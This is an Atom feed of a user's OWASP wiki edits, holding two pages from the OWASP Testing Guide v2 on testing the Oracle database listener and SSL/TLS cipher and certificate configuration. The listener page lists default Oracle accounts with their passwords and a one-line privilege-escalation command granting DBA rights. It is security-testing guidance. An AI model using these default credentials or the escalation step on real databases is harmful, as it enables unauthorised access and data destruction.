<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
		<id>https://wiki.owasp.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Katie.mcdowell</id>
		<title>OWASP - User contributions [en]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki.owasp.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Katie.mcdowell"/>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php/Special:Contributions/Katie.mcdowell"/>
		<updated>2026-05-02T23:29:11Z</updated>
		<subtitle>User contributions</subtitle>
		<generator>MediaWiki 1.27.2</generator>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Testing_for_DB_Listener_(OWASP-CM-002)&amp;diff=16268</id>
		<title>Testing for DB Listener (OWASP-CM-002)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Testing_for_DB_Listener_(OWASP-CM-002)&amp;diff=16268"/>
				<updated>2007-02-07T18:39:37Z</updated>
		
		<summary type="html">&lt;p&gt;Katie.mcdowell: Grammar and spelling.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
The Data base listener is a network daemon unique to Oracle databases. It waits for connection requests from remote clients.&lt;br /&gt;
This daemon can be compromised and hence can affect the availability of the database.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
The DB listener is the entry point for remote connections to an Oracle database. It listens for connection requests and handles them accordingly. This test is possible if the tester can access to this service -- the test should be done from the Intranet (major Oracle installations don't expose this service to the external network).&lt;br /&gt;
The listener, by default, listens on port 1521(port 2483 is the new officially registered port for the TNS Listener and 2484 for the TNS Listener using SSL). Itt is good practice to change the listener from this port to another arbitrary port number.&lt;br /&gt;
If this listener is &amp;quot;turned off&amp;quot; remote access to the database is not possible. If this is the case ones application would fail also creating a denial of service attack. &lt;br /&gt;
&lt;br /&gt;
'''Potential areas of attack:'''&lt;br /&gt;
*Stop the Listener -- create a DoS attack.&lt;br /&gt;
*Set a password and prevent others from controlling the Listener - Hijack the DB.&lt;br /&gt;
*Write trace and log files to any file accessible to the process owner of tnslnsr (usually Oracle) - Possible information leakage.&lt;br /&gt;
*Obtain detailed information on the Listener, database, and application configuration.&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
Upon discovering the port on which the listener resides, one can assess the listener by running a tool developed by Integrigy:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;[[Image:Listener_Test.JPG]]&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The tool above checks the following:&lt;br /&gt;
'''Listener Password'''&lt;br /&gt;
On many Oracle systems, the listener password may not be set. The tool above verifies this.&lt;br /&gt;
If the password is not set, an attacker could set the password  and hijack the listener, albeit the password can be removed by locally editing the Listener.ora file.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Enable Logging'''&lt;br /&gt;
The tool above also tests to see if logging has been enabled. If it has not, one would not detect any change to the listener or have a record of it. Also, detection of brute force attacks on the listener would not be audited.&lt;br /&gt;
&lt;br /&gt;
'''Admin Restrictions'''&lt;br /&gt;
If Admin restrictions are not enabled, it is possible to use the &amp;quot;SET&amp;quot; commands remotely.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Example'''&lt;br /&gt;
If you find a TCP/1521 open port on a server, you may have an Oracle Listener that accepts connections from the outside. If the listener is not protected by an authentication mechanism, or if you can find easily a credential, it is possible to exploit this vulnerability to enumerate the Oracle services. For example, using LSNRCTL(.exe) (contained in every Client Oracle installation), you can obtain the following output:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
TNSLSNR for 32-bit Windows: Version 9.2.0.4.0 - Production&lt;br /&gt;
TNS for 32-bit Windows: Version 9.2.0.4.0 - Production&lt;br /&gt;
Oracle Bequeath NT Protocol Adapter for 32-bit Windows: Version 9.2.0.4.0 - Production&lt;br /&gt;
Windows NT Named Pipes NT Protocol Adapter for 32-bit Windows: Version 9.2.0.4.0 - Production&lt;br /&gt;
Windows NT TCP/IP NT Protocol Adapter for 32-bit Windows: Version 9.2.0.4.0 - Production,,&lt;br /&gt;
SID(s): SERVICE_NAME = CONFDATA&lt;br /&gt;
SID(s): INSTANCE_NAME = CONFDATA&lt;br /&gt;
SID(s): SERVICE_NAME = CONFDATAPDB&lt;br /&gt;
SID(s): INSTANCE_NAME = CONFDATA&lt;br /&gt;
SID(s): SERVICE_NAME = CONFORGANIZ&lt;br /&gt;
SID(s): INSTANCE_NAME = CONFORGANIZ&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The Oracle Listener permits to enumerate default users on Oracle Server:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
User name	Password&lt;br /&gt;
OUTLN	        OUTLN&lt;br /&gt;
DBSNMP	        DBSNMP&lt;br /&gt;
BACKUP	        BACKUP&lt;br /&gt;
MONITOR	        MONITOR&lt;br /&gt;
PDB	        CHANGE_ON_INSTALL&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In this case, we have not founded privileged DBA accounts, but OUTLN and BACKUP accounts hold a fundamental privilege: EXECUTE ANY PROCEDURE. This means that it is possible to execute all procedures, for example the following:&lt;br /&gt;
&lt;br /&gt;
 exec dbms_repcat_admin.grant_admin_any_schema('BACKUP');&lt;br /&gt;
&lt;br /&gt;
The execution of this command permits one to obtain DBA privileges. Now the user can interact directly with the DB and execute, for example:&lt;br /&gt;
 &lt;br /&gt;
 select * from session_privs ;&lt;br /&gt;
&lt;br /&gt;
The output is the following screenshot:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;[[Image:ToadListener2.PNG]]&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The user can now execute a lot of operations, in particular:&lt;br /&gt;
DELETE ANY TABLE &lt;br /&gt;
DROP ANY TABLE.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Listener default ports'''&lt;br /&gt;
During the discovery phase of an Oracle server one may discover the following ports. The following is a list of the default ports:&lt;br /&gt;
&lt;br /&gt;
 1521: Default port for the TNS Listener. &lt;br /&gt;
 1522 – 1540: Commonly used ports for the TNS Listener&lt;br /&gt;
 1575: Default port for the Oracle Names Server&lt;br /&gt;
 1630: Default port for the Oracle Connection Manager – client connections&lt;br /&gt;
 1830: Default port for the Oracle Connection Manager – admin connections&lt;br /&gt;
 2481: Default port for Oracle JServer/Java VM listener&lt;br /&gt;
 2482: Default port for Oracle JServer/Java VM listener using SSL&lt;br /&gt;
 2483: New port for the TNS Listener&lt;br /&gt;
 2484: New port for the TNS Listener using SSL&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
'''Testing for restriction of the privileges of the listener''':&lt;br /&gt;
It is important to give the listener least privilege so it can not read or write files in the database or in the server memory address space.&lt;br /&gt;
&lt;br /&gt;
The file ''Listener.ora'' is used to define the database listener properties.&lt;br /&gt;
One should check that the following line is present in the Listener.ora file:&lt;br /&gt;
'''ADMIN_RESTRICTIONS_LISTENER=ON'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Listener password''':&lt;br /&gt;
Many common exploits are performed due to the listener password not being set.&lt;br /&gt;
By checking the Listener.ora file, one can determine if the password is set:&lt;br /&gt;
&lt;br /&gt;
The password can be set manually by editing the Listener.ora file. This is performed by editing the following: PASSWORDS_&amp;lt;listener name&amp;gt;. This issue with this manual method is that the password stored in cleartext, and can be read by anyone with acess to the Listener.ora file.&lt;br /&gt;
A more secure way is to use the LSNRCTRL tool and invoke the ''change_password'' command.&lt;br /&gt;
&lt;br /&gt;
 LSNRCTL for 32-bit Windows: Version 9.2.0.1.0 - Production on 24-FEB-2004 11:27:55&lt;br /&gt;
 Copyright (c) 1991, 2002, Oracle Corporation.  All rights reserved.&lt;br /&gt;
 Welcome to LSNRCTL, type &amp;quot;help&amp;quot; for information.&lt;br /&gt;
 LSNRCTL&amp;gt; set current_listener listener&lt;br /&gt;
 Current Listener is listener&lt;br /&gt;
 LSNRCTL&amp;gt; change_password&lt;br /&gt;
 Old password:&lt;br /&gt;
 New password:&lt;br /&gt;
 Reenter new password:&lt;br /&gt;
 Connecting to &amp;lt;ADDRESS&amp;gt;&lt;br /&gt;
 Password changed for listener&lt;br /&gt;
 The command completed successfully&lt;br /&gt;
 LSNRCTL&amp;gt; set password&lt;br /&gt;
 Password:&lt;br /&gt;
 The command completed successfully&lt;br /&gt;
 LSNRCTL&amp;gt; save_config&lt;br /&gt;
 Connecting to &amp;lt;ADDRESS&amp;gt;&lt;br /&gt;
 Saved LISTENER configuration parameters.&lt;br /&gt;
 Listener Parameter File   D:\oracle\ora90\network\admin\listener.ora&lt;br /&gt;
 Old Parameter File   D:\oracle\ora90\network\admin\listener.bak&lt;br /&gt;
 The command completed successfully&lt;br /&gt;
 LSNRCTL&amp;gt;			&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
'''Whitepapers'''&lt;br /&gt;
* Oracle Database Listener Security Guide - http://www.integrigy.com/security-resources/whitepapers/Integrigy_Oracle_Listener_TNS_Security.pdf&lt;br /&gt;
'''Tools'''&lt;br /&gt;
* TNS Listener tool (Perl) - http://www.jammed.com/%7Ejwa/hacks/security/tnscmd/tnscmd-doc.html&lt;br /&gt;
* Toad for Oracle - http://www.quest.com/toad&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;br /&gt;
--[[User:Katie.mcdowell|Katie.mcdowell]] 13:39, 7 February 2007 (EST)&lt;/div&gt;</summary>
		<author><name>Katie.mcdowell</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Testing_for_SSL-TLS_(OWASP-CM-001)&amp;diff=16266</id>
		<title>Testing for SSL-TLS (OWASP-CM-001)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Testing_for_SSL-TLS_(OWASP-CM-001)&amp;diff=16266"/>
				<updated>2007-02-07T18:25:44Z</updated>
		
		<summary type="html">&lt;p&gt;Katie.mcdowell: Grammar and spelling.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
&lt;br /&gt;
Due to historical exporting restrictions of high grade cryptography, legacy and new web servers could be able to handle a weak cryptographic support.&lt;br /&gt;
&lt;br /&gt;
Even if high grade ciphers are normally used and installed, some misconfiguration in server installation could be used to force the use of a weaker cipher to gain access to the supposed secure communication channel. &lt;br /&gt;
&lt;br /&gt;
==Testing SSL / TLS cipher specifications and requirements for site==&lt;br /&gt;
&lt;br /&gt;
The http clear-text protocol is normally secured via an SSL or TLS tunnel, resulting in https traffic. In addition to providing encryption of data in transit, https allows the identification of servers (and, optionally, of clients) by means of digital certificates.&lt;br /&gt;
&lt;br /&gt;
Historically, there have been limitations set in place by the U.S. government to allow cryptosystems to be exported only for key sizes of, at most, 40 bits, a key length which could be broken and would allow the decryption of communications. Since then, cryptographic export regulations have been relaxed (though some constraints still hold); however, it is important to check the SSL configuration being used to avoid putting in place cryptographic support which could be easily defeated. SSL-based services should not offer the possibility to choose weak ciphers.&lt;br /&gt;
&lt;br /&gt;
Technically, cipher determination is performed as follows. In the initial phase of a SSL connection setup, the client sends to the server a Client Hello message specifying, among other information, the cipher suites that it is able to handle. A client is usually a web browser (most popular SSL client nowadays…), but not necessarily, since it can be any SSL-enabled application; the same holds for the server, which needs not be a web server, though this is the most common case. (For example, a noteworthy class of SSL clients is that of SSL proxies such as stunnel (www.stunnel.org) which can be used to allow non-SSL enabled tools to talk to SSL services.) A cipher suite is specified by an encryption protocol (DES, RC4, AES), the encryption key length (such as 40, 56, or 128 bits), and a hash algorithm (SHA, MD5) used for integrity checking. Upon receiving a Client Hello message, the server decides which cipher suite it will use for that session. It is possible (for example, by means of configuration directives) to specify which cipher suites the server will honour. In this way you may control, for example, whether or not conversations with clients will support 40-bit encryption only.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Black Box Test and example===&lt;br /&gt;
&lt;br /&gt;
In order to detect possible support of weak ciphers, the ports associated to SSL/TLS wrapped services must be identified. These typically include port 443, which is the standard https port; however, this may change because a) https services may be configured to run on non-standard ports, and b) there may be additional SSL/TLS wrapped services related to the web application. In general, a service discovery is required to identify such ports.&lt;br /&gt;
&lt;br /&gt;
The nmap scanner, via the “–sV” scan option, is able to identify SSL services. Vulnerability Scanners, in addition to performing service discovery, may include checks against weak ciphers (for example, the Nessus scanner has the capability of checking SSL services on arbitrary ports, and will report weak ciphers).&lt;br /&gt;
&lt;br /&gt;
'''Example 1'''. SSL service recognition via nmap.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
[root@test]# nmap -F -sV localhost&lt;br /&gt;
&lt;br /&gt;
Starting nmap 3.75 ( http://www.insecure.org/nmap/ ) at 2005-07-27 14:41 CEST&lt;br /&gt;
Interesting ports on localhost.localdomain (127.0.0.1):&lt;br /&gt;
(The 1205 ports scanned but not shown below are in state: closed)&lt;br /&gt;
&lt;br /&gt;
PORT      STATE SERVICE         VERSION&lt;br /&gt;
443/tcp   open  ssl             OpenSSL&lt;br /&gt;
901/tcp   open  http            Samba SWAT administration server&lt;br /&gt;
8080/tcp  open  http            Apache httpd 2.0.54 ((Unix) mod_ssl/2.0.54 OpenSSL/0.9.7g PHP/4.3.11)&lt;br /&gt;
8081/tcp  open  http            Apache Tomcat/Coyote JSP engine 1.0&lt;br /&gt;
&lt;br /&gt;
Nmap run completed -- 1 IP address (1 host up) scanned in 27.881 seconds&lt;br /&gt;
[root@test]# &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Example 2'''. Identifying weak ciphers with Nessus.&lt;br /&gt;
The following is an anonymized excerpt of a report generated by the Nessus scanner, corresponding to the identification of a server certificate allowing weak ciphers (see underlined text).&lt;br /&gt;
&lt;br /&gt;
  '''https (443/tcp)'''&lt;br /&gt;
  '''Description'''&lt;br /&gt;
  Here is the SSLv2 server certificate:&lt;br /&gt;
  Certificate:&lt;br /&gt;
  Data:&lt;br /&gt;
  Version: 3 (0x2)&lt;br /&gt;
  Serial Number: 1 (0x1)&lt;br /&gt;
  Signature Algorithm: md5WithRSAEncryption&lt;br /&gt;
  Issuer: C=**, ST=******, L=******, O=******, OU=******, CN=******&lt;br /&gt;
  Validity&lt;br /&gt;
  Not Before: Oct 17 07:12:16 2002 GMT&lt;br /&gt;
  Not After : Oct 16 07:12:16 2004 GMT&lt;br /&gt;
  Subject: C=**, ST=******, L=******, O=******, CN=******&lt;br /&gt;
  Subject Public Key Info:&lt;br /&gt;
  Public Key Algorithm: rsaEncryption&lt;br /&gt;
  RSA Public Key: (1024 bit)&lt;br /&gt;
  Modulus (1024 bit):&lt;br /&gt;
  00:98:4f:24:16:cb:0f:74:e8:9c:55:ce:62:14:4e:&lt;br /&gt;
  6b:84:c5:81:43:59:c1:2e:ac:ba:af:92:51:f3:0b:&lt;br /&gt;
  ad:e1:4b:22:ba:5a:9a:1e:0f:0b:fb:3d:5d:e6:fc:&lt;br /&gt;
  ef:b8:8c:dc:78:28:97:8b:f0:1f:17:9f:69:3f:0e:&lt;br /&gt;
  72:51:24:1b:9c:3d:85:52:1d:df:da:5a:b8:2e:d2:&lt;br /&gt;
  09:00:76:24:43:bc:08:67:6b:dd:6b:e9:d2:f5:67:&lt;br /&gt;
  e1:90:2a:b4:3b:b4:3c:b3:71:4e:88:08:74:b9:a8:&lt;br /&gt;
  2d:c4:8c:65:93:08:e6:2f:fd:e0:fa:dc:6d:d7:a2:&lt;br /&gt;
  3d:0a:75:26:cf:dc:47:74:29&lt;br /&gt;
  Exponent: 65537 (0x10001)&lt;br /&gt;
  X509v3 extensions:&lt;br /&gt;
  X509v3 Basic Constraints:&lt;br /&gt;
  CA:FALSE&lt;br /&gt;
  Netscape Comment:&lt;br /&gt;
  OpenSSL Generated Certificate&lt;br /&gt;
  Page 10&lt;br /&gt;
  Network Vulnerability Assessment Report 25.05.2005&lt;br /&gt;
  X509v3 Subject Key Identifier:&lt;br /&gt;
  10:00:38:4C:45:F0:7C:E4:C6:A7:A4:E2:C9:F0:E4:2B:A8:F9:63:A8&lt;br /&gt;
  X509v3 Authority Key Identifier:&lt;br /&gt;
  keyid:CE:E5:F9:41:7B:D9:0E:5E:5D:DF:5E:B9:F3:E6:4A:12:19:02:76:CE&lt;br /&gt;
  DirName:/C=**/ST=******/L=******/O=******/OU=******/CN=******&lt;br /&gt;
  serial:00&lt;br /&gt;
  Signature Algorithm: md5WithRSAEncryption&lt;br /&gt;
  7b:14:bd:c7:3c:0c:01:8d:69:91:95:46:5c:e6:1e:25:9b:aa:&lt;br /&gt;
  8b:f5:0d:de:e3:2e:82:1e:68:be:97:3b:39:4a:83:ae:fd:15:&lt;br /&gt;
  2e:50:c8:a7:16:6e:c9:4e:76:cc:fd:69:ae:4f:12:b8:e7:01:&lt;br /&gt;
  b6:58:7e:39:d1:fa:8d:49:bd:ff:6b:a8:dd:ae:83:ed:bc:b2:&lt;br /&gt;
  40:e3:a5:e0:fd:ae:3f:57:4d:ec:f3:21:34:b1:84:97:06:6f:&lt;br /&gt;
  f4:7d:f4:1c:84:cc:bb:1c:1c:e7:7a:7d:2d:e9:49:60:93:12:&lt;br /&gt;
  0d:9f:05:8c:8e:f9:cf:e8:9f:fc:15:c0:6e:e2:fe:e5:07:81:&lt;br /&gt;
  82:fc&lt;br /&gt;
  Here is the list of available SSLv2 ciphers:&lt;br /&gt;
  RC4-MD5&lt;br /&gt;
  EXP-RC4-MD5&lt;br /&gt;
  RC2-CBC-MD5&lt;br /&gt;
  EXP-RC2-CBC-MD5&lt;br /&gt;
  DES-CBC-MD5&lt;br /&gt;
  DES-CBC3-MD5&lt;br /&gt;
  RC4-64-MD5&lt;br /&gt;
  &amp;lt;u&amp;gt;The SSLv2 server offers 5 strong ciphers, but also 0 medium strength and '''2 weak &amp;quot;export class&amp;quot; ciphers'''.&lt;br /&gt;
  The weak/medium ciphers may be chosen by an export-grade or badly configured client software. They only offer a limited protection against a brute force attack&amp;lt;/u&amp;gt;&lt;br /&gt;
  &amp;lt;u&amp;gt;Solution: disable those ciphers and upgrade your client software if necessary.&amp;lt;/u&amp;gt;&lt;br /&gt;
  See http://support.microsoft.com/default.aspx?scid=kben-us216482&lt;br /&gt;
  or http://httpd.apache.org/docs-2.0/mod/mod_ssl.html#sslciphersuite&lt;br /&gt;
  This SSLv2 server also accepts SSLv3 connections.&lt;br /&gt;
  This SSLv2 server also accepts TLSv1 connections.&lt;br /&gt;
  &lt;br /&gt;
  Vulnerable hosts&lt;br /&gt;
  ''(list of vulnerable hosts follows)''&lt;br /&gt;
&lt;br /&gt;
'''Example 3'''. Manually audit weak SSL cipher levels with OpenSSL. The following will attempt to connect to Google.com with SSLv2.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
[root@test]# openssl s_client -no_tls1 -no_ssl3 -connect www.google.com:443&lt;br /&gt;
CONNECTED(00000003)&lt;br /&gt;
depth=0 /C=US/ST=California/L=Mountain View/O=Google Inc/CN=www.google.com&lt;br /&gt;
verify error:num=20:unable to get local issuer certificate&lt;br /&gt;
verify return:1&lt;br /&gt;
depth=0 /C=US/ST=California/L=Mountain View/O=Google Inc/CN=www.google.com&lt;br /&gt;
verify error:num=27:certificate not trusted&lt;br /&gt;
verify return:1&lt;br /&gt;
depth=0 /C=US/ST=California/L=Mountain View/O=Google Inc/CN=www.google.com&lt;br /&gt;
verify error:num=21:unable to verify the first certificate&lt;br /&gt;
verify return:1&lt;br /&gt;
---&lt;br /&gt;
Server certificate&lt;br /&gt;
-----BEGIN CERTIFICATE-----&lt;br /&gt;
MIIDYzCCAsygAwIBAgIQYFbAC3yUC8RFj9MS7lfBkzANBgkqhkiG9w0BAQQFADCB&lt;br /&gt;
zjELMAkGA1UEBhMCWkExFTATBgNVBAgTDFdlc3Rlcm4gQ2FwZTESMBAGA1UEBxMJ&lt;br /&gt;
Q2FwZSBUb3duMR0wGwYDVQQKExRUaGF3dGUgQ29uc3VsdGluZyBjYzEoMCYGA1UE&lt;br /&gt;
CxMfQ2VydGlmaWNhdGlvbiBTZXJ2aWNlcyBEaXZpc2lvbjEhMB8GA1UEAxMYVGhh&lt;br /&gt;
d3RlIFByZW1pdW0gU2VydmVyIENBMSgwJgYJKoZIhvcNAQkBFhlwcmVtaXVtLXNl&lt;br /&gt;
cnZlckB0aGF3dGUuY29tMB4XDTA2MDQyMTAxMDc0NVoXDTA3MDQyMTAxMDc0NVow&lt;br /&gt;
aDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCkNhbGlmb3JuaWExFjAUBgNVBAcTDU1v&lt;br /&gt;
dW50YWluIFZpZXcxEzARBgNVBAoTCkdvb2dsZSBJbmMxFzAVBgNVBAMTDnd3dy5n&lt;br /&gt;
b29nbGUuY29tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC/e2Vs8U33fRDk&lt;br /&gt;
5NNpNgkB1zKw4rqTozmfwty7eTEI8PVH1Bf6nthocQ9d9SgJAI2WOBP4grPj7MqO&lt;br /&gt;
dXMTFWGDfiTnwes16G7NZlyh6peT68r7ifrwSsVLisJp6pUf31M5Z3D88b+Yy4PE&lt;br /&gt;
D7BJaTxq6NNmP1vYUJeXsGSGrV6FUQIDAQABo4GmMIGjMB0GA1UdJQQWMBQGCCsG&lt;br /&gt;
AQUFBwMBBggrBgEFBQcDAjBABgNVHR8EOTA3MDWgM6Axhi9odHRwOi8vY3JsLnRo&lt;br /&gt;
YXd0ZS5jb20vVGhhd3RlUHJlbWl1bVNlcnZlckNBLmNybDAyBggrBgEFBQcBAQQm&lt;br /&gt;
MCQwIgYIKwYBBQUHMAGGFmh0dHA6Ly9vY3NwLnRoYXd0ZS5jb20wDAYDVR0TAQH/&lt;br /&gt;
BAIwADANBgkqhkiG9w0BAQQFAAOBgQADlTbBdVY6LD1nHWkhTadmzuWq2rWE0KO3&lt;br /&gt;
Ay+7EleYWPOo+EST315QLpU6pQgblgobGoI5x/fUg2U8WiYj1I1cbavhX2h1hda3&lt;br /&gt;
FJWnB3SiXaiuDTsGxQ267EwCVWD5bCrSWa64ilSJTgiUmzAv0a2W8YHXdG08+nYc&lt;br /&gt;
X/dVk5WRTw==&lt;br /&gt;
-----END CERTIFICATE-----&lt;br /&gt;
subject=/C=US/ST=California/L=Mountain View/O=Google Inc/CN=www.google.com&lt;br /&gt;
issuer=/C=ZA/ST=Western Cape/L=Cape Town/O=Thawte Consulting cc/OU=Certification Services Division/CN=Thawte Premium Server CA/emailAddress=premium-server@thawte.com&lt;br /&gt;
---&lt;br /&gt;
No client certificate CA names sent&lt;br /&gt;
---&lt;br /&gt;
Ciphers common between both SSL endpoints:&lt;br /&gt;
RC4-MD5         EXP-RC4-MD5     RC2-CBC-MD5&lt;br /&gt;
EXP-RC2-CBC-MD5 DES-CBC-MD5     DES-CBC3-MD5&lt;br /&gt;
RC4-64-MD5&lt;br /&gt;
---&lt;br /&gt;
SSL handshake has read 1023 bytes and written 333 bytes&lt;br /&gt;
---&lt;br /&gt;
New, SSLv2, Cipher is DES-CBC3-MD5&lt;br /&gt;
Server public key is 1024 bit&lt;br /&gt;
Compression: NONE&lt;br /&gt;
Expansion: NONE&lt;br /&gt;
SSL-Session:&lt;br /&gt;
    Protocol  : SSLv2&lt;br /&gt;
    Cipher    : DES-CBC3-MD5&lt;br /&gt;
    Session-ID: 709F48E4D567C70A2E49886E4C697CDE&lt;br /&gt;
    Session-ID-ctx:&lt;br /&gt;
    Master-Key: 649E68F8CF936E69642286AC40A80F433602E3C36FD288C3&lt;br /&gt;
    Key-Arg   : E8CB6FEB9ECF3033&lt;br /&gt;
    Start Time: 1156977226&lt;br /&gt;
    Timeout   : 300 (sec)&lt;br /&gt;
    Verify return code: 21 (unable to verify the first certificate)&lt;br /&gt;
---&lt;br /&gt;
closed&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===White Box Test and example===&lt;br /&gt;
&lt;br /&gt;
Check the configuration of the web servers which provide https services. If the web application provides other SSL/TLS wrapped services, these should be checked as well.&lt;br /&gt;
&lt;br /&gt;
'''Example:''' The registry path in windows 2k3 defines the ciphers available to the server:&lt;br /&gt;
&lt;br /&gt;
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\&lt;br /&gt;
&lt;br /&gt;
==Testing SSL certificate validity – client and server==&lt;br /&gt;
&lt;br /&gt;
When accessing a web application via the https protocol, a secure channel is established between the client (usually the browser) and the server. The identity of one (the server) or both parties (client and server)  is then established by means of digital certificates. In order for the communication to be set up, a number of checks on the certificates must be passed. While discussing SSL and certificate based authentication is beyond the scope of this Guide, we will focus on the main criteria involved in ascertaining certificate validity: a) checking if the Certificate Authority (CA) is a known one (meaning one considered trusted), b) checking that the certificate is currently valid, and c) checking that the name of the site and the name reported in the certificate  match.&lt;br /&gt;
&lt;br /&gt;
Let’s examine each check more in detail.&lt;br /&gt;
&lt;br /&gt;
a) Each browser comes with a preloaded list of trusted CAs, against which the certificate signing CA is compared (this list can be customized and expanded at will). During the initial negotiations with a https server, if the server certificate relates to a CA unknown to the browser, a warning is usually raised. This happens most often because a web application relies on a certificate signed by a self-established CA. Whether this is to be considered a concern depends on several factors. For example, this may be fine for an Intranet environment (think of corporate web email being provided via https; here, obviously all users recognize the internal CA as a trusted CA). When a service is provided to the general public via the Internet, however (i.e. when it is important to positively verify the identity of the server we are talking to), it is usually imperative to rely on a trusted CA, one which is  recognized by all the user base (and here we stop with our considerations, we won’t delve deeper in the implications of the trust model being used by digital certificates).&lt;br /&gt;
&lt;br /&gt;
b) Certificates have an associated period of validity, therefore they may expire. Again, we are warned by the browser about this. A public service needs a temporally valid certificate; otherwise, it means we are talking with a server whose certificate was issued by someone we trust, but has expired without being renewed.&lt;br /&gt;
&lt;br /&gt;
c) What if the name on the certificate and the name of the server do not match? If this happens, it might sound suspicious. For a number of reasons, this is not so rare to see. A system may host a number of name-based virtual hosts, which share the same IP address and are identified by means of the HTTP 1.1 Host: header information. In this case, since the SSL handshake checks the server certificate before the HTTP request is processed, it is not possible to assign different certificates to each virtual server. Therefore, if the name of the site and the name reported in the certificate do not match, we have a condition which is typically signalled by the browser. To avoid this, IP-based virtual servers must be used. [2] and [3] describe techniques to deal with this problem and allow name-based virtual hosts to be correctly referenced.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Black Box Testing and examples===&lt;br /&gt;
&lt;br /&gt;
Examine the validity of the certificates used by the application. Browsers will issue a warning when encountering expired certificates, certificates issued by untrusted CAs, and certificates which do not match namewise with the site jto which they should refer. By clicking on the padlock which appears in the browser window when visiting an https site, you can look at information related to the certificate – including the issuer, period of validity, encryption characteristics, etc.&lt;br /&gt;
&lt;br /&gt;
If the application requires a client certificate, you probably have installed one to access it. Certificate information is available in the browser by inspecting the relevant certificate(s) in the list of the installed certificates.&lt;br /&gt;
&lt;br /&gt;
These checks must be applied to all visible SSL-wrapped communication channels used by the application. Though this is the usual https service running on port 443, there may be additional services involved depending on the web application architecture and on deployment issues (an https administrative port left open, https services on non-standard ports, etc.). Therefore, apply these checks to all SSL-wrapped ports which have been discovered. For example, the nmap scanner features a scanning mode (enabled by the –sV command line switch) which identifies SSL-wrapped services. The Nessus vulnerability scanner has the capability of performing SSL checks on all SSL/TLS-wrapped services.&lt;br /&gt;
&lt;br /&gt;
'''Examples'''&lt;br /&gt;
&lt;br /&gt;
Rather than providing a fictitious example, we have inserted an anonymized real-life example to stress how frequently one stumbles on https sites whose certificates are inaccurate with respect to naming.&lt;br /&gt;
&lt;br /&gt;
The following screenshots refer to a regional site of a high-profile IT company.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;Warning issued by Microsoft Internet Explorer.&amp;lt;/u&amp;gt; We are visiting a ''.it'' site and the certificate was issued to a ''.com ''site! Internet Explorer warns that the name on the certificate does not match the name of the site.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Image:SSL Certificate Validity Testing IE Warning.gif]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;Warning issued by Mozilla Firefox.&amp;lt;/u&amp;gt; The message issued by Firefox is different – Firefox complains because it cannot ascertain the identity of the ''.com'' site the certificate refers to because it does not know the CA which signed the certificate. In fact, Internet Explorer and Firefox do not come preloaded with the same list of CAs. Therefore, the behavior experienced with various browsers may differ.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Image:SSL Certificate Validity Testing Firefox Warning.gif]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===White Box Testing and examples===&lt;br /&gt;
&lt;br /&gt;
Examine the validity of the certificates used by the application at both server and client levels. The usage of certificates is primarily at the web server level; however, there may be additional communication paths protected by SSL (for example, towards the DBMS). You should check the application architecture to identify all SSL protected channels.&lt;br /&gt;
&lt;br /&gt;
